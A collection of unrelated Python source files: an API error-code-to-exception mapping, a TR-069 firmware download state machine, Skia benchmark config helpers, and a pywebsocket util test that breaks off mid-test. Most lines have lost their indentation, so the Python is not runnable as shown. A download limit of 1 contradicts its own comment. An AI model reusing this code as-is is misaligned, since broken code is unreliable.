return HttpInternalServerErrorException(status, code, message)
elif code == "invalid_format":
return InvalidFormatException(status, code, message)
elif code == "invalid_param_comb":
return InvalidParamCombException(status, code, message)
elif code == "invalid_range":
return InvalidRangeException(status, code, message)
elif code == "invalid_uri_argument":
return InvalidUriArgumentException(status, code, message)
elif code == "ipv6net_already_attached":
return IpV6NetAlreadyAttachedException(status, code, message)
elif code == "length_required":
return HttpLengthRequiredException(status, code, message)
elif code == "limit_count_in_account":
return LimitCountInAccountException(status, code, message)
elif code == "limit_count_in_member":
return LimitCountInMemberException(status, code, message)
elif code == "limit_count_in_network":
return LimitCountInNetworkException(status, code, message)
elif code == "limit_count_in_router":
return LimitCountInRouterException(status, code, message)
elif code == "limit_count_in_zone":
return LimitCountInZoneException(status, code, message)
elif code == "limit_memory_in_account":
return LimitMemoryInAccountException(status, code, message)
elif code == "limit_size_in_account":
return LimitSizeInAccountException(status, code, message)
elif code == "locked":
return HttpLockedException(status, code, message)
elif code == "method_not_allowed":
return HttpMethodNotAllowedException(status, code, message)
elif code == "missing_iso_image":
return MissingIsoImageException(status, code, message)
elif code == "missing_param":
return MissingParamException(status, code, message)
elif code == "must_be_of_same_zone":
return MustBeOfSameZoneException(status, code, message)
elif code == "no_display_response":
return NoDisplayResponseException(status, code, message)
elif code == "not_acceptable":
return HttpNotAcceptableException(status, code, message)
elif code == "not_extended":
return HttpNotExtendedException(status, code, message)
elif code == "not_for_router":
return NotForRouterException(status, code, message)
elif code == "not_found":
return HttpNotFoundException(status, code, message)
elif code == "not_implemented":
return HttpNotImplementedException(status, code, message)
elif code == "not_replicating":
return NotReplicatingException(status, code, message)
elif code == "not_with_hybridconn":
return NotWithHybridconnException(status, code, message)
elif code == "old_storage_plan":
return OldStoragePlanException(status, code, message)
elif code == "operation_failure":
return OperationFailureException(status, code, message)
elif code == "operation_timeout":
return OperationTimeoutException(status, code, message)
elif code == "original_hash_mismatch":
return OriginalHashMismatchException(status, code, message)
elif code == "packetfilter_applying":
return PacketFilterApplyingException(status, code, message)
elif code == "packetfilter_version_mismatch":
return PacketFilterVersionMismatchException(status, code, message)
elif code == "param_ip_not_found":
return ParamIpNotFoundException(status, code, message)
elif code == "param_res_not_found":
return ParamResNotFoundException(status, code, message)
elif code == "payment_creditcard":
return PaymentCreditCardException(status, code, message)
elif code == "payment_payment":
return PaymentPaymentException(status, code, message)
elif code == "payment_registration":
return PaymentRegistrationException(status, code, message)
elif code == "payment_required":
return HttpPaymentRequiredException(status, code, message)
elif code == "payment_telcertification":
return PaymentTelCertificationException(status, code, message)
elif code == "payment_unpayable":
return PaymentUnpayableException(status, code, message)
elif code == "penalty_operation":
return PenaltyOperationException(status, code, message)
elif code == "precondition_failed":
return HttpPreconditionFailedException(status, code, message)
elif code == "proxy_authentication_required":
return HttpProxyAuthenticationRequiredException(status, code, message)
elif code == "replica_already_exists":
return ReplicaAlreadyExistsException(status, code, message)
elif code == "replica_not_found":
return ReplicaNotFoundException(status, code, message)
elif code == "request_entity_too_large":
return HttpRequestEntityTooLargeException(status, code, message)
elif code == "request_timeout":
return HttpRequestTimeoutException(status, code, message)
elif code == "request_uri_too_long":
return HttpRequestUriTooLongException(status, code, message)
elif code == "requested_range_not_satisfiable":
return HttpRequestedRangeNotSatisfiableException(status, code, message)
elif code == "res_already_connected":
return ResAlreadyConnectedException(status, code, message)
elif code == "res_already_disconnected":
return ResAlreadyDisconnectedException(status, code, message)
elif code == "res_already_exists":
return ResAlreadyExistsException(status, code, message)
elif code == "res_used_in_zone":
return ResUsedInZoneException(status, code, message)
elif code == "resource_path_not_found":
return ResourcePathNotFoundException(status, code, message)
elif code == "run_out_of_ipaddress":
return RunOutOfIpAddressException(status, code, message)
elif code == "same_license_required":
return SameLicenseRequiredException(status, code, message)
elif code == "server_could_not_stop":
return ServerCouldNotStopException(status, code, message)
elif code == "server_is_cleaning":
return ServerIsCleaningException(status, code, message)
elif code == "server_operation_failure":
return ServerOperationFailureException(status, code, message)
elif code == "server_power_must_be_down":
return ServerPowerMustBeDownException(status, code, message)
elif code == "server_power_must_be_up":
return ServerPowerMustBeUpException(status, code, message)
elif code == "service_temporarily_unavailable":
return ServiceTemporarilyUnavailableException(status, code, message)
elif code == "service_unavailable":
return HttpServiceUnavailableException(status, code, message)
elif code == "size_mismatch":
return SizeMismatchException(status, code, message)
elif code == "snapshot_in_migration":
return SnapshotInMigrationException(status, code, message)
elif code == "still_creating":
return StillCreatingException(status, code, message)
elif code == "storage_abnormal":
return StorageAbnormalException(status, code, message)
elif code == "storage_operation_failure":
return StorageOperationFailureException(status, code, message)
elif code == "switch_hybrid_connected":
return SwitchHybridConnectedException(status, code, message)
elif code == "template_ftp_is_open":
return TemplateFtpIsOpenException(status, code, message)
elif code == "template_is_incomplete":
return TemplateIsIncompleteException(status, code, message)
elif code == "too_many_request":
return TooManyRequestException(status, code, message)
elif code == "unauthorized":
return HttpUnauthorizedException(status, code, message)
elif code == "unknown":
return UnknownException(status, code, message)
elif code == "unknown_os_type":
return UnknownOsTypeException(status, code, message)
elif code == "unprocessable_entity":
return HttpUnprocessableEntityException(status, code, message)
elif code == "unsupported_media_type":
return HttpUnsupportedMediaTypeException(status, code, message)
elif code == "unsupported_res_class":
return UnsupportedResClassException(status, code, message)
elif code == "upgrade_required":
return HttpUpgradeRequiredException(status, code, message)
elif code == "user_not_specified":
return UserNotSpecifiedException(status, code, message)
elif code == "variant_also_negotiates":
return HttpVariantAlsoNegotiatesException(status, code, message)
elif code == "vnc_proxy_request_failure":
return VncProxyRequestFailureException(status, code, message)
if status == 400:
return HttpBadRequestException(status, code, message)
elif status == 401:
return HttpUnauthorizedException(status, code, message)
elif status == 402:
return HttpPaymentRequiredException(status, code, message)
elif status == 403:
return HttpForbiddenException(status, code, message)
elif status == 404:
return HttpNotFoundException(status, code, message)
elif status == 405:
return HttpMethodNotAllowedException(status, code, message)
elif status == 406:
return HttpNotAcceptableException(status, code, message)
elif status == 407:
return HttpProxyAuthenticationRequiredException(status, code, message)
elif status == 408:
return HttpRequestTimeoutException(status, code, message)
elif status == 409:
return HttpConflictException(status, code, message)
elif status == 410:
return HttpGoneException(status, code, message)
elif status == 411:
return HttpLengthRequiredException(status, code, message)
elif status == 412:
return HttpPreconditionFailedException(status, code, message)
        elif status == 413:
            return HttpRequestEntityTooLargeException(status, code, message)
        elif status == 414:
            return HttpRequestUriTooLongException(status, code, message)
        elif status == 415:
            return HttpUnsupportedMediaTypeException(status, code, message)
elif status == 416:
return HttpRequestedRangeNotSatisfiableException(status, code, message)
elif status == 417:
return HttpExpectationFailedException(status, code, message)
elif status == 422:
return HttpUnprocessableEntityException(status, code, message)
elif status == 423:
return HttpLockedException(status, code, message)
elif status == 424:
return HttpFailedDependencyException(status, code, message)
elif status == 426:
return HttpUpgradeRequiredException(status, code, message)
        elif status == 500:
            return HttpInternalServerErrorException(status, code, message)
elif status == 501:
return HttpNotImplementedException(status, code, message)
elif status == 502:
return HttpBadGatewayException(status, code, message)
elif status == 503:
return HttpServiceUnavailableException(status, code, message)
elif status == 504:
return HttpGatewayTimeoutException(status, code, message)
elif status == 505:
return HttpHttpVersionNotSupportedException(status, code, message)
elif status == 506:
return HttpVariantAlsoNegotiatesException(status, code, message)
elif status == 507:
return HttpInsufficientStorageException(status, code, message)
elif status == 510:
return HttpNotExtendedException(status, code, message)
return HttpException(status, code, message)
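# The chain above can equivalently be driven by a lookup table; a minimal
# sketch (illustrative, not part of the original module; the table is
# truncated to two of the codes handled above):
_CODE_TO_EXCEPTION = {
    "not_found": HttpNotFoundException,
    "unauthorized": HttpUnauthorizedException,
}
def _create_by_code(status, code, message):
    cls = _CODE_TO_EXCEPTION.get(code)
    if cls is not None:
        return cls(status, code, message)
    return HttpException(status, code, message)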
#!/usr/bin/python
# Source: ankurjimmy/catawampus tr/download.py
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handlers for tr-69 Download and Scheduled Download."""
__author__ = 'dgentry@google.com (Denton Gentry)'
import collections
import datetime
import errno
import os
import shutil
import time
import urlparse
import google3
import tornado
import tornado.httpclient
import tornado.ioloop
import tornado.web
import core
import helpers
import http_download
import persistobj
# Persistent object storage filename
DNLDROOTNAME = 'tr69_dnld'
BOOTROOTNAME = 'tr69_boot'
class Installer(object):
"""Install a downloaded image and reboot.
This default implementation returns an error response. Platforms are
expected to implement their own Install object, and set
tr.download.INSTALLER = their object.
"""
  def __init__(self, filename=None):
    self.filename = filename
  def install(self, file_type, target_filename, callback):
INTERNAL_ERROR = 9002
    callback(faultcode=INTERNAL_ERROR,
             faultstring='No installer for this platform.',
             must_reboot=False)
def reboot(self):
return False
# Class to be instantiated after the image is downloaded. Platform code is
# expected to put its own installer here; the default reports that the
# install failed.
INSTALLER = Installer
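# Illustrative sketch (not part of this module): the shape of a platform
# installer. The actual flash-writing step is elided; a real implementation
# lives in platform code.
class ExamplePlatformInstaller(Installer):
  def install(self, file_type, target_filename, callback):
    # Write self.filename to flash here, then report the outcome.
    callback(faultcode=0, faultstring='', must_reboot=True)
  def reboot(self):
    return True
# A platform would then set: tr.download.INSTALLER = ExamplePlatformInstaller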
# Unit tests can substitute mock objects here
DOWNLOAD_CLIENT = {
'http': http_download.HttpDownload,
'https': http_download.HttpDownload
}
# State machine description. Generate a diagram using Graphviz:
# ./download.py
graphviz = r"""
digraph DLstates {
node [shape=box]
START [label="START"]
WAITING [label="WAITING\nstart timer"]
DOWNLOADING [label="DOWNLOADING\nstart download"]
INSTALLING [label="INSTALLING\nstart install"]
REBOOTING [label="REBOOTING\ninitiate reboot"]
EXITING [label="EXITING\nsend TransferComplete"]
DONE [label="DONE\ncleanup, not a\nreal state"]
START -> WAITING
WAITING -> DOWNLOADING [label="timer\nexpired"]
DOWNLOADING -> INSTALLING [label="download\ncomplete"]
DOWNLOADING -> EXITING [label="download\nfailed"]
INSTALLING -> REBOOTING [label="install\ncomplete"]
INSTALLING -> EXITING [label="install\nfailed"]
INSTALLING -> EXITING [label="must_reboot=False"]
REBOOTING -> EXITING [label="rebooted,\ncorrect image"]
REBOOTING -> EXITING [label="rebooted,\nincorrect image"]
EXITING -> DONE [label="receive\nTransferCompleteResponse"]
}
"""
class Download(object):
"""A state machine to handle a single tr-69 Download RPC."""
# States in the state machine. See docs/download.dot for details
START = 'START'
WAITING = 'WAITING'
DOWNLOADING = 'DOWNLOADING'
INSTALLING = 'INSTALLING'
REBOOTING = 'REBOOTING'
EXITING = 'EXITING'
# State machine events
EV_START = 1
EV_TIMER = 2
EV_DOWNLOAD_COMPLETE = 3
EV_INSTALL_COMPLETE = 4
EV_REBOOT_COMPLETE = 5
EV_TCRESPONSE = 6
def __init__(self, stateobj, transfer_complete_cb,
download_dir=None, ioloop=None):
"""Download object.
Args:
stateobj: a PersistentObject to store state across reboots.
This class requires that command_key and url attributes be present.
      transfer_complete_cb: function to send a TransferComplete message.
      download_dir: directory in which to store downloaded files.
      ioloop: Tornado ioloop. Unit tests can pass in a mock.
"""
self.stateobj = self._restore_dlstate(stateobj)
self.transfer_complete_cb = transfer_complete_cb
self.download_dir = download_dir
self.ioloop = ioloop or tornado.ioloop.IOLoop.instance()
self.download = None
self.downloaded_fileobj = None
self.downloaded_file = None
self.wait_handle = None
# the delay_seconds started when we received the RPC, even if we have
# downloaded other files and rebooted since then.
if not hasattr(self.stateobj, 'wait_start_time'):
self.stateobj.Update(wait_start_time=time.time())
def CommandKey(self):
return getattr(self.stateobj, 'command_key', None)
def _restore_dlstate(self, stateobj):
"""Re-enter the state machine at a sane state.
This state machine is supposed to download a file, install that file,
reboot, and send a completion. To do this it stores its state to
the filesystem so it can read it back in after a reboot.
If we reboot unexpectedly, like a power failure, we may have to backtrack.
For example if we had downloaded the file to /tmp and then powered off,
we lose the file and have to download it again.
The state machine can only resume into the START and REBOOTING states.
Args:
stateobj: the PersistentObject for this transfer
Returns:
the stateobj
"""
if not hasattr(stateobj, 'dlstate'):
stateobj.Update(dlstate=self.START)
dlstate = stateobj.dlstate
if dlstate == self.REBOOTING or dlstate == self.EXITING:
stateobj.Update(dlstate=self.REBOOTING)
else:
stateobj.Update(dlstate=self.START)
return stateobj
def _schedule_timer(self):
delay_seconds = getattr(self.stateobj, 'delay_seconds', 0)
now = time.time()
wait_start_time = self.stateobj.wait_start_time
# sanity checks
if wait_start_time > now:
wait_start_time = now
when = wait_start_time + delay_seconds
if when < now:
when = now
self.wait_handle = self.ioloop.add_timeout(
datetime.timedelta(seconds=when-now),
self.timer_callback)
def _new_download_object(self, stateobj):
url = getattr(stateobj, 'url', '')
username = getattr(stateobj, 'username', None)
password = getattr(stateobj, 'password', None)
o = urlparse.urlparse(url)
client = DOWNLOAD_CLIENT[o.scheme]
return client(url=url, username=username, password=password,
download_complete_cb=self.download_complete_callback,
download_dir=self.download_dir)
def _send_transfer_complete(self, faultcode, faultstring, start=0.0, end=0.0):
event_code = getattr(self.stateobj, 'event_code', 'M Download')
self.transfer_complete_cb(dl=self,
command_key=self.stateobj.command_key,
faultcode=faultcode,
faultstring=faultstring,
starttime=start, endtime=end,
event_code=event_code)
def state_machine(self, event, faultcode=0, faultstring='',
downloaded_file=None, must_reboot=False):
dlstate = self.stateobj.dlstate
if dlstate == self.START:
if event == self.EV_START or event == self.EV_REBOOT_COMPLETE:
self.stateobj.Update(dlstate=self.WAITING)
self._schedule_timer()
elif dlstate == self.WAITING:
if event == self.EV_TIMER:
self.download = self._new_download_object(self.stateobj)
self.stateobj.Update(dlstate=self.DOWNLOADING,
download_start_time=time.time())
self.download.fetch()
      # TODO(dgentry): need a timeout, in case download never finishes.
elif dlstate == self.DOWNLOADING:
if event == self.EV_DOWNLOAD_COMPLETE:
self.download = None # no longer needed
if faultcode == 0:
self.installer = INSTALLER(downloaded_file)
self.stateobj.Update(dlstate=self.INSTALLING)
file_type = getattr(self.stateobj, 'file_type', None)
target_filename = getattr(self.stateobj, 'target_filename', None)
self.installer.install(file_type=file_type,
target_filename=target_filename,
callback=self.installer_callback)
else:
self.stateobj.Update(dlstate=self.EXITING)
self._send_transfer_complete(faultcode, faultstring)
elif dlstate == self.INSTALLING:
if event == self.EV_INSTALL_COMPLETE:
if self.downloaded_file:
helpers.Unlink(self.downloaded_file)
if faultcode == 0:
if must_reboot:
self.stateobj.Update(dlstate=self.REBOOTING)
self.installer.reboot()
else:
end = time.time()
self.stateobj.Update(dlstate=self.EXITING,
download_complete_time=end)
start = getattr(self.stateobj, 'download_start_time', 0.0)
self._send_transfer_complete(faultcode=0, faultstring='',
start=start, end=end)
else:
self.stateobj.Update(dlstate=self.EXITING)
self._send_transfer_complete(faultcode, faultstring)
elif dlstate == self.REBOOTING:
if event == self.EV_REBOOT_COMPLETE:
# TODO(dgentry) check version, whether image was actually installed
end = time.time()
self.stateobj.Update(dlstate=self.EXITING, download_complete_time=end)
if faultcode == 0:
start = getattr(self.stateobj, 'download_start_time', 0.0)
self._send_transfer_complete(faultcode=0, faultstring='',
start=start, end=end)
else:
self._send_transfer_complete(faultcode, faultstring)
elif dlstate == self.EXITING:
pass
def do_start(self):
return self.state_machine(self.EV_START)
def timer_callback(self):
"""Called by timer code when timeout expires."""
return self.state_machine(self.EV_TIMER)
def download_complete_callback(self, faultcode, faultstring, tmpfile):
print 'Download complete callback.'
name = tmpfile and tmpfile.name or None
self.downloaded_fileobj = tmpfile # keep this around or it auto-deletes
self.downloaded_file = name
return self.state_machine(self.EV_DOWNLOAD_COMPLETE,
faultcode, faultstring,
downloaded_file=name)
def installer_callback(self, faultcode, faultstring, must_reboot):
return self.state_machine(self.EV_INSTALL_COMPLETE, faultcode, faultstring,
must_reboot=must_reboot)
def reboot_callback(self, faultcode, faultstring):
return self.state_machine(self.EV_REBOOT_COMPLETE, faultcode, faultstring)
def cleanup(self):
"""Attempt to stop all activity and clean up resources.
Returns:
      None - successfully stopped and cleaned up
string - the reason download cannot be safely cancelled right now.
"""
dlstate = self.stateobj.dlstate
if dlstate == self.INSTALLING:
return 'Download is currently installing to flash'
if dlstate == self.REBOOTING:
return 'Download has been installed, awaiting reboot'
if self.wait_handle:
self.ioloop.remove_timeout(self.wait_handle)
self.wait_handle = None
if self.download:
self.download.close()
self.download = None
self.stateobj.Delete()
def get_queue_state(self):
"""Data needed for GetQueuedTransfers/GetAllQueuedTransfers RPC."""
q = collections.namedtuple(
'queued_transfer_struct',
('CommandKey State IsDownload FileType FileSize TargetFileName'))
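    # The fields are filled in as attributes on the freshly created
    # namedtuple class itself; no instance is ever constructed.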
q.CommandKey = self.stateobj.command_key
dlstate = self.stateobj.dlstate
if dlstate == self.START or dlstate == self.WAITING:
qstate = 1 # Not yet started
elif dlstate == self.EXITING:
qstate = 3 # Completed, finishing cleanup
else:
qstate = 2 # In progress
q.State = qstate
q.IsDownload = True
q.FileType = getattr(self.stateobj, 'file_type', None)
q.FileSize = getattr(self.stateobj, 'file_size', 0)
q.TargetFileName = getattr(self.stateobj, 'target_filename', '')
return q
# Object to track an individual Download RPC. Unit tests can override this.
DOWNLOADOBJ = Download
class DownloadManager(object):
"""Manage Download requests from the ACS.
Each RPC gets a Download object, which runs a state machine to track
the progress of the operation. The DownloadManager allocates, manages
and deletes the active Download objects.
SPEC: http://www.broadband-forum.org/technical/download/TR-069_Amendment-3.pdf
"""
  # Maximum simultaneous downloads. tr-69 requires a minimum of 3.
MAXDOWNLOADS = 1
def __init__(self, ioloop=None):
self.ioloop = ioloop or tornado.ioloop.IOLoop.instance()
self._downloads = list()
self._pending_complete = list()
self.config_dir = '/tmp/'
self.download_dir = '/tmp/'
# Function to send RPCs, to be filled in by parent object.
self.send_transfer_complete = None
def NewDownload(self, command_key=None, file_type=None, url=None,
username=None, password=None, file_size=0,
target_filename=None, delay_seconds=0):
"""Initiate a new download, handling a tr-69 Download RPC.
Args:
      command_key, file_type, url, username, password, file_size,
target_filename, delay_seconds: as defined in tr-69 Amendment 3
(page 82 of $SPEC)
Raises:
core.ResourcesExceededError: too many simultaneous downloads
core.FileTransferProtocolError: Unsupported URL type, ex: ftp
Returns:
(code, starttime, endtime):
code = status to return (1 == send TransferComplete later, $SPEC pg 85)
starttime, endtime = two floating point numbers in seconds for the
StartTime and CompleteTime of the DownloadResponse.
"""
# TODO(dgentry) check free space?
if len(self._downloads) >= self.MAXDOWNLOADS:
faultstring = 'Max downloads (%d) reached.' % self.MAXDOWNLOADS
raise core.ResourcesExceededError(faultstring)
o = urlparse.urlparse(url)
if o.scheme not in DOWNLOAD_CLIENT:
raise core.FileTransferProtocolError(
'Unsupported URL scheme %s' % o.scheme)
kwargs = dict(command_key=command_key,
file_type=file_type,
url=url,
username=username,
password=password,
file_size=file_size,
target_filename=target_filename,
delay_seconds=delay_seconds,
event_code='M Download')
pobj = persistobj.PersistentObject(objdir=self.config_dir,
rootname=DNLDROOTNAME,
filename=None,
ignore_errors=True,
**kwargs)
dl = DOWNLOADOBJ(stateobj=pobj,
transfer_complete_cb=self.TransferCompleteCallback,
download_dir=self.download_dir)
self._downloads.append(dl)
dl.do_start()
return (1, 0.0, 0.0)
def TransferCompleteCallback(self, dl, command_key, faultcode, faultstring,
starttime, endtime, event_code):
self._downloads.remove(dl)
self._pending_complete.append(dl)
if self.send_transfer_complete:
self.send_transfer_complete(command_key, faultcode, faultstring,
starttime, endtime, event_code)
def RestoreDownloads(self):
pobjs = persistobj.GetPersistentObjects(objdir=self.config_dir,
rootname=DNLDROOTNAME)
for pobj in pobjs:
if not hasattr(pobj, 'command_key'):
print 'Download Object %s has no command_key' % pobj.filename
pobj.Delete()
continue
dl = DOWNLOADOBJ(stateobj=pobj,
transfer_complete_cb=self.TransferCompleteCallback,
download_dir=self.download_dir)
self._downloads.append(dl)
dl.reboot_callback(0, None)
def TransferCompleteResponseReceived(self):
dl = self._pending_complete.pop()
dl.cleanup()
def GetAllQueuedTransfers(self):
transfers = list()
for dl in self._downloads:
transfers.append(dl.get_queue_state())
for dl in self._pending_complete:
transfers.append(dl.get_queue_state())
return transfers
def CancelTransfer(self, command_key):
"""Cancel an in-progress transfer.
Args:
command_key: the command_key to cancel. There can be multiple transfers
with the same command_key. $SPEC says to attempt to cancel all of them,
return failure if any cannot be cancelled.
Raises:
core.CancelNotPermitted: download cannot be cancelled right now.
"""
    for dl in list(self._downloads):  # copy: items may be removed below
if dl.CommandKey() == command_key:
faultstring = dl.cleanup()
if faultstring:
raise core.CancelNotPermitted(faultstring)
else:
self._downloads.remove(dl)
for dl in self._pending_complete:
if dl.CommandKey() == command_key:
raise core.CancelNotPermitted(
'Installed, awaiting TransferCompleteResponse')
def _DelayedReboot(self):
installer = INSTALLER('')
installer.reboot()
def RestoreReboots(self):
pobjs = persistobj.GetPersistentObjects(objdir=self.config_dir,
rootname=BOOTROOTNAME)
reboots = []
for pobj in pobjs:
if hasattr(pobj, 'command_key'):
reboots.append(('M Reboot', pobj.command_key))
else:
print 'Reboot object %s has no command_key' % pobj.filename
pobj.Delete()
return reboots
def Reboot(self, command_key):
"""Reboot the system."""
kwargs = dict(command_key=command_key)
pobj = persistobj.PersistentObject(objdir=self.config_dir, rootname=BOOTROOTNAME,
filename=None, **kwargs)
self.ioloop.add_callback(self._DelayedReboot)
def _MakeDirsIgnoreError(self, directory):
"""Make sure a directory exists."""
try:
os.makedirs(directory, 0755)
except OSError:
pass
def SetDirectories(self, config_dir, download_dir):
self.config_dir = os.path.join(config_dir, 'state')
self.download_dir = os.path.join(download_dir, 'dnld')
self._MakeDirsIgnoreError(self.config_dir)
self._MakeDirsIgnoreError(self.download_dir)
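# Illustrative usage sketch (not part of this module); the ACS URL and
# command key below are made up.
def _example_new_download(dm):
  dm.SetDirectories(config_dir='/tmp/cwmp', download_dir='/tmp/cwmp')
  dm.send_transfer_complete = lambda *args: None  # parent would send the RPC
  return dm.NewDownload(command_key='cmdkey-1',
                        file_type='1 Firmware Upgrade Image',
                        url='http://acs.example.com/image.bin',
                        file_size=1000, target_filename='image.bin',
                        delay_seconds=0)  # (1, 0.0, 0.0) on success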
def main():
# Generate diagram for Download state machine
import subprocess #pylint: disable-msg=C6204
cmd = ['dot', '-Tpdf', '-odownloadStateMachine.pdf']
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
print p.communicate(input=graphviz)[0]
if __name__ == '__main__':
main()
# Source: guorendong/iridium-browser-ubuntu third_party/skia/tools/bench_pictures_cfg_helper.py
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Helper functions to be used in bench_pictures.cfg. """
def Config(**kwargs):
  return dict(kwargs)
def TileArgs(tile_x, tile_y, timeIndividualTiles=True):
config = {'mode': ['tile', str(tile_x), str(tile_y)]}
if timeIndividualTiles:
config['timeIndividualTiles'] = True
return config
def BitmapConfig(**kwargs):
return Config(config='8888', **kwargs)
def GPUConfig(**kwargs):
return Config(config='gpu', **kwargs)
def TiledBitmapConfig(tile_x, tile_y, timeIndividualTiles=True, **kwargs):
return BitmapConfig(**dict(TileArgs(tile_x, tile_y,
timeIndividualTiles=timeIndividualTiles).items() + kwargs.items()))
def TiledGPUConfig(tile_x, tile_y, **kwargs):
return GPUConfig(**dict(TileArgs(tile_x, tile_y).items() + kwargs.items()))
def TiledConfig(tile_x, tile_y, timeIndividualTiles=True, **kwargs):
return Config(**dict(TileArgs(tile_x, tile_y,
timeIndividualTiles=timeIndividualTiles).items() + kwargs.items()))
def ViewportBitmapConfig(viewport_x, viewport_y, **kwargs):
return BitmapConfig(viewport=[str(viewport_x), str(viewport_y)], **kwargs)
def ViewportGPUConfig(viewport_x, viewport_y, **kwargs):
return GPUConfig(viewport=[str(viewport_x), str(viewport_y)], **kwargs)
def ViewportRTreeConfig(viewport_x, viewport_y, **kwargs):
return RTreeConfig(mode='simple', viewport=[str(viewport_x), str(viewport_y)],
**kwargs)
def ViewportGridConfig(viewport_x, viewport_y, **kwargs):
return GridConfig(viewport_x, viewport_y, mode='simple',
viewport=[str(viewport_x), str(viewport_y)], **kwargs)
def CopyTilesConfig(tile_x, tile_y, **kwargs):
return BitmapConfig(mode=['copyTile', str(tile_x), str(tile_y)], **kwargs)
def RecordConfig(**kwargs):
return BitmapConfig(mode='record', **kwargs)
def PlaybackCreationConfig(**kwargs):
return BitmapConfig(mode='playbackCreation', **kwargs)
def MultiThreadTileConfig(threads, tile_x, tile_y, **kwargs):
return TiledBitmapConfig(tile_x=tile_x, tile_y=tile_y,
timeIndividualTiles=False, multi=str(threads),
**kwargs)
def RTreeConfig(**kwargs):
return BitmapConfig(bbh='rtree', **kwargs)
def GridConfig(tile_x, tile_y, mode, **kwargs):
return BitmapConfig(mode=mode, bbh=['grid', str(tile_x), str(tile_y)],
**kwargs)
def RecordRTreeConfig(**kwargs):
return RTreeConfig(mode='record', **kwargs)
def PlaybackCreationRTreeConfig(**kwargs):
return RTreeConfig(mode='playbackCreation', **kwargs)
def TileRTreeConfig(tile_x, tile_y, **kwargs):
return RTreeConfig(**dict(TileArgs(tile_x, tile_y).items() + kwargs.items()))
def RecordGridConfig(tile_x, tile_y, **kwargs):
return GridConfig(tile_x=tile_x, tile_y=tile_y, mode='record', **kwargs)
def PlaybackCreationGridConfig(tile_x, tile_y, **kwargs):
  return GridConfig(tile_x, tile_y, mode='playbackCreation', **kwargs)
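# Example (illustrative, not part of the original helper): the kind of
# entries a bench_pictures.cfg file might build with these helpers.
def ExampleConfigs():
  return {
      'tiled_8888': TiledBitmapConfig(256, 256),
      'viewport_gpu': ViewportGPUConfig(1000, 1000),
  }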
#!/usr/bin/env python
# Source: Syrcon/servo tests/wpt/web-platform-tests/tools/pywebsocket/src/test/test_util.py
#
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for util module."""
import os
import random
import sys
import unittest
import set_sys_path # Update sys.path to locate mod_pywebsocket module.
from mod_pywebsocket import util
_TEST_DATA_DIR = os.path.join(os.path.split(__file__)[0], 'testdata')
class UtilTest(unittest.TestCase):
"""A unittest for util module."""
def test_get_stack_trace(self):
self.assertEqual('None\n', util.get_stack_trace())
try:
a = 1 / 0 # Intentionally raise exception.
except Exception:
trace = util.get_stack_trace()
self.failUnless(trace.startswith('Traceback'))
self.failUnless(trace.find('ZeroDivisionError') != -1)
def test_prepend_message_to_exception(self):
exc = Exception('World')
self.assertEqual('World', str(exc))
util.prepend_message_to_exception('Hello ', exc)
self.assertEqual('Hello World', str(exc))
def test_get_script_interp(self):
cygwin_path = 'c:\\cygwin\\bin'
cygwin_perl = os.path.join(cygwin_path, 'perl')
self.assertEqual(None, util.get_script_interp(
os.path.join(_TEST_DATA_DIR, 'README')))
self.assertEqual(None, util.get_script_interp(
os.path.join(_TEST_DATA_DIR, 'README'), cygwin_path))
self.assertEqual('/usr/bin/perl -wT', util.get_script_interp(
os.path.join(_TEST_DATA_DIR, 'hello.pl')))
self.assertEqual(cygwin_perl + ' -wT', util.get_script_interp(
os.path.join(_TEST_DATA_DIR, 'hello.pl'), cygwin_path))
def test_hexify(self):
self.assertEqual('61 7a 41 5a 30 39 20 09 0d 0a 00 ff',
util.hexify('azAZ09 \t\r\n\x00\xff'))
class RepeatedXorMaskerTest(unittest.TestCase):
"""A unittest for RepeatedXorMasker class."""
def test_mask(self):
# Sample input e6,97,a5 is U+65e5 in UTF-8
masker = util.RepeatedXorMasker('\xff\xff\xff\xff')
result = masker.mask('\xe6\x97\xa5')
self.assertEqual('\x19\x68\x5a', result)
masker = util.RepeatedXorMasker('\x00\x00\x00\x00')
result = masker.mask('\xe6\x97\xa5')
self.assertEqual('\xe6\x97\xa5', result)
masker = util.RepeatedXorMasker('\xe6\x97\xa5\x20')
result = masker.mask('\xe6\x97\xa5')
self.assertEqual('\x00\x00\x00', result)
def test_mask_twice(self):
masker = util.RepeatedXorMasker('\x00\x7f\xff\x20')
# mask[0], mask[1], ... will be used.
